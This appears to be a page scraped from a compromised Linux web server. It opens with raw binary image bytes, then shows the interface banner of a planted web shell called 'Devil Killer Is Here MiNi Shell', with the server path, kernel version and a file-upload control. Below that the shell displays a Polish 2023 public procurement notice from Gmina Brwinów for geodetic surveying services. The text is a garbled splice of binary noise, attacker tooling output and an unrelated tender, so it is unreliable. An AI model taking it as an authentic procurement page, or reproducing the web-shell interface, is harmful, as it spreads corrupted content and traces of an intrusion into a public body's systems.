JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230214/0009468501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi geodezyjne. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Brwinów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269203</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grodziska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Brwinów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 738 25 67</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">halina.bak@brwinow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">brwinow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi geodezyjne. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f9da7d81-ac45-11ed-9236-36fed59ea7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00094685</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00017836/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi geodezyjne.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugb.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugb.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu Zamawiający oferty, oświadczenia, o których mowa w art. 125 ust.1 Pzp, podmiotowe środki dowodowe, w tym oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy wspólnie ubiegający się o zamówienia /art. 117 ust. 4 Pzp/, oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, pełnomocnictwo sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2020 r. poz. 346, 568, 695, 1517 i 2320), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju<br/>przekazywanych danych.2. Komunikacja elektroniczna w zakresie przekazywania sobie przez strony<br/>postępowania informacji, oświadczeń, wniosków, zawiadomień - za pośrednictwem Platformy<br/>zakupowej znajdującej się pod adresem: https://ugb.ezamawiajacy.pl w zakładce „Korespondencja”.3.<br/>Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za<br/>dokumenty złożone w wyznaczonym terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed<br/>upływem tego terminu. Za datę wpływu informacji, oświadczeń, wniosków, zawiadomień przyjmuje się datę ich złożenia na Platformie zakupowej.4. Wykonawca może zwrócić się do Zamawiającego o<br/>wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy Zakupowej Przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy &#34;pytanie wysłane&#34;. 4.1. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania odpowiednio ofert albo ofert podlegających negocjacjom, pod warunkiem że wniosek o wyjaśnienie treści odpowiednio SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania odpowiednio ofert albo ofert podlegających negocjacjom.4.2. Jeżeli Zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w ust. 4.1, przedłuża termin składania odpowiednio ofert albo ofert podlegających negocjacjom o czas niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia odpowiednio ofert albo ofert podlegających negocjacjom.4.3. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynął w terminie, o którym mowa w ust. 6.1, Zamawiający nie ma obowiązku udzielania odpowiednio wyjaśnień SWZ oraz obowiązku przedłużenia terminu składania odpowiednio ofert albo ofert podlegających negocjacjom.4.4. Przedłużenie terminu składania ofert, o których mowa w ust. 6.1, nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści odpowiednio SWZ.5. Treść pytań wraz z wyjaśnieniami, bez ujawniania źródła zapytania, informacje o dokonaniu modyfikacji SWZ, Zamawiający udostępnia na Platformie Zakupowej.6. Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie zakupowej tj.:6.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;6.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;6.3. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;6.4. Włączona obsługa JavaScript;6.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Gmina Brwinów, reprezentowana przez Burmistrza Gminy Brwinów z siedzibą w Brwinowie, ul. Grodziska 12, 05-840 Brwinów, adres e-mail: brwinow@brwinow.pl,<br/>•	inspektor ochrony danych osobowych w Urzędzie Gminy Brwinów: tel. 22 738 25 69 lub adres e-mail: iod@brwinow.pl,<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego prowadzonego w trybie podstawowym;<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2022 poz. 1710 ze zm.), dalej „ustawa Pzp”;<br/>•	Pani/Pana dane osobowe mogą być przetwarzane w związku z realizacją i rozliczeniem umowy dotacyjnej. Przekazanie danych osobowych do instytucji dotujących dotyczyć może wyłącznie danych niezbędnych do prawidłowego wykonania i rozliczenia umowy dotacyjnej; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>•	posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>•	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.,<br/>•	odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Urzędu Gminy Brwinów oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy <br/>ul. Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Brwinów prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod adresem: https://ugb.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są usługi geodezyjne.<br/>2.	Zakres przedmiotu zamówienia obejmuje:<br/><br/>Część 1 :<br/>Zadanie 1. Regulacja stanu prawnego ul. Wigusin w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 2. Regulacja stanu prawnego ul. A. Struga w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 3. Regulacja stanu prawnego ul. S. Batorego w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 4. Regulacja stanu prawnego ul. Jagiellońskiej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 5. Regulacja stanu prawnego ul. Kolejowej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 6. Regulacja stanu prawnego ul. Kieleckiej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 7. Regulacja stanu prawnego ul. Jaśminowej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 8. Regulacja stanu prawnego ul. Piastowej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 9. Regulacja stanu prawnego ul. Helenowskiej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 10. Regulacja stanu prawnego ul. Piotrkowskiej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 11. Regulacja stanu prawnego ul. Ogrodowej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 12. Regulacja stanu prawnego ul. Polnej w obrębie Otrębusy gm. Brwinów (dot. dz. ew. nr 853/2), w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 13. Regulacja stanu prawnego ul. Poziomki w obrębie Otrębusy gm. Brwinów (dot. części dz. nr ew. 477/108 i nr ew. 477/109), w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 14. Regulacja stanu prawnego ul. Józefowskiej w obrębie Krosna-Wieś gm. Brwinów (dot. części dz. nr ew. 64 i nr ew. 66), w oparciu o art. 73 ustawy z dnia 13 października 1998r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 15. Regulacja stanu prawnego ul. Parzniewskiej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/>Zadanie 16. Regulacja stanu prawnego ul. Krańcowej w Brwinowie, w oparciu o art. 73 ustawy z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. z 1998 r. Nr 133, poz. 872 ze zm.).<br/><br/>Wykonanie części 1 zamówienia polega na sporządzeniu dokumentacji geodezyjno-prawnej niezbędnej do regulacji stanu prawnego gruntów zajętych pod drogi publiczne, w celu realizacji przepisu art. 73 ustawy z dnia 13 października 1998 r. – przepisy wprowadzające ustawy reformujące administrację publiczną, w tym: <br/>- ustaleniu stanu zagospodarowania wymienionych działek na dzień 31 grudnia 1998 r. i obecnie oraz sporządzeniu z tej czynności pisemnej informacji (protokołu),<br/>- wkreśleniu na załączniku mapowym granicy zasięgu pasa drogowego według stanu na dzień 31 grudnia 1998 r.<br/>1)	sporządzając ww. dokumentację Wykonawca dołoży wszelkich starań w celu szerokiego zebrania informacji o stanie nieruchomości i zasięgu pasa drogowego w dacie 31 grudnia 1998r. od właścicieli nieruchomości przylegających do wymienionych dróg. Dla ustalenia linii zasięgu pasa drogowego w obszarze poszczególnych ulic, Wykonawca przeanalizuje wszystkie dostępne materiały zgromadzone w zasobie PODGiK w Pruszkowie, w szczególności operaty jednostkowe, zasób bazowy do mapy zasadniczej oraz ortofotomapy; zarówno aktualne, jak i archiwalne, celem odszukania informacji o sposobie zagospodarowania i zainwestowania działek zajętych pod drogę w dacie 31 grudnia 1998 r. <br/>2)	Wykonawca dokona badania ksiąg wieczystych, hipotecznych, zbioru dokumentów lub innych dokumentów istniejących dla działek z przedstawieniem właściciela zarówno na dzień 31.12.1998 r., jak i na dzień sporządzenia zamawianej dokumentacji, ze wskazaniem dokumentów będących podstawą wpisu właściciela w dziale II KW, jeśli działki lub ich części uregulowane są w księgach wieczystych,<br/>3)	z pisemnej informacji nt. stanu zagospodarowania działki (protokołu) powinno jednoznacznie wynikać: <br/>- jakiej działki informacja dotyczy; jeśli informacja dotyczy działki wydzielanej, należy wskazać nowy numer oraz nową powierzchnię, wraz ze wskazaniem z jakiej działki została wydzielona, a jeśli informacja dotyczy działki w całości, należy wskazać numer ewidencyjny działki oraz jej powierzchnię,<br/>- położenie działek, tj. obręb, nazwa miejscowości, nazwa ulicy przy której są położone, a także numer drogi publicznej aktualny w dniu 31.12.1998 r.,<br/>- szczegółowy opis czy dane działki znajdowały się w pasie drogi publicznej w całości czy w części,<br/>- jakie elementy pasa drogowego znajdowały się w obszarze działek w dniu 31.12.1998r.,<br/>- jakie elementy pasa drogowego znajdują się w obszarze działek obecnie,<br/>- na podstawie jakich dokumentów Wykonawca ustalił stan zajętości działek pod pas drogowy na dzień 31.12.1998 r. i wskazał elementy pasa drogowego znajdujące się w obszarze działek.<br/>4)	do sporządzonej informacji nt. stanu zagospodarowania działek, Wykonawca załączy aktualną na dzień sporządzenia dokumentacji mapę zasadniczą z wykazanymi granicami ewidencyjnymi działek zajętych pod drogę publiczną, z naniesioną granicą pasa drogowego według stanu na dzień 31.12.1998 r., ze wskazaniem numeru drogi gminnej.<br/>Na mapie zasadniczej stanowiącej załącznik do informacji o stanie zagospodarowania działek, należy umieścić legendę opisującą jednoznacznie zastosowane oznaczenia, w szczególności linię rozgraniczającą zasięg pasa drogowego wg stanu na dzień 31.12.1998 r. oraz granice przedmiotowych działek i działek sąsiednich oraz adnotację, że przebieg linii rozgraniczającej pas drogowy na sporządzonej mapie został ustalony wg stanu na dzień 31.12.1998 r.<br/>Jeśli zastosowana skala mapy nie pozwala na jednoznaczną identyfikację jej elementów, należy zastosować wyniesienie w zakresie danej działki w innej czytelnej skali, podając jednocześnie zastosowaną jej wielkość.<br/>5)	w toku przeprowadzania prac dotyczących zadania Wykonawca zobowiązany jest:<br/>- dokonać weryfikacji danych w terenie w zakresie niezbędnym do sporządzenia dokumentacji,<br/>- przekazać odpowiednia dokumentację do PODGiK w Pruszkowie celem przeprowadzenia stosownej kontroli i przyjęcia do zasobu.<br/>6)	sporządzając dokumentację dla zadań 12, 13, 14, Wykonawca zapozna się z dokumentacją sporządzoną dla wymienianych działek zgromadzoną w tutejszym Referacie Gospodarki Nieruchomościami.<br/><br/>W ramach zadania 1 -16 należy wykonać:<br/>- odbitki mapy z wydzieleniem z przedmiotowych działek, gruntu zajętego pod drogę publiczną wraz z wykazem zmian gruntowych, jeśli jej wykonanie było konieczne, w ilości 5 szt. – wszystkie opatrzone pieczęcią przyjęcia do zasobu geodezyjnego i kartograficznego,<br/>- badania hipoteczne w ilości 2 egz., przy czym w przypadku gdy część działki została odłączona należy wykonać szkic historyczny nieruchomości z oznaczeniem zajętości pod drogę na dzień 31.12.1998 r.,<br/>- pisemną informację (protokół) nt. ustalenia zajętości gruntu pod drogę publiczną na dzień 31.12.1998 r. oraz obecnie wraz z załącznikiem – 2 egz.,<br/>- wykaz synchronizacyjny, w przypadku innych oznaczeń w ewidencji gruntów niż w dokumencie stanowiącym tytuł własności gruntu.<br/>Wszystkie sporządzone i przekazane Zleceniodawcy materiały muszą posiadać cechy dokumentu, w szczególności pieczęć nagłówkową Wykonawcy oraz podpis i imienną pieczątkę geodety uprawnionego sporządzającego dokumentację. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71222100-1 - Usługi kartograficzne w zakresie obszarów miejskich</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71222200-2 - 